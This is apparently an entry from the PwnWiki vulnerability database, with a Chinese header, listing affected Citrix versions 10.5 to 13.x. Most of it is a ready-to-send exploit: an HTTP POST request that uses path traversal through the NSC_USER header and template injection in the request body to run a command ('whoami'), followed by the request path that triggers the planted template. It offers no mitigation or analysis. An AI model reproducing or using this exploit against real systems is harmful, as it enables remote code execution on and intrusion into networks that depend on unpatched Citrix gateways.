免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
漏洞影响
Citrix 13.x,12.1,12.0,11.1,10.5
EXP1
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 Host: target-ip Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.23.0 NSC_NONCE: nsroot NSC_USER: ../../../netscaler/portal/templates/15ffbdca Content-Length: 89
url=http://example.com&title=test&desc=% template.new('BLOCK' = 'print whoami') %
Payload:
/vpn/../vpns/portal/test.xml
免费、自由、人人可编辑的漏洞库--pwnwiki.com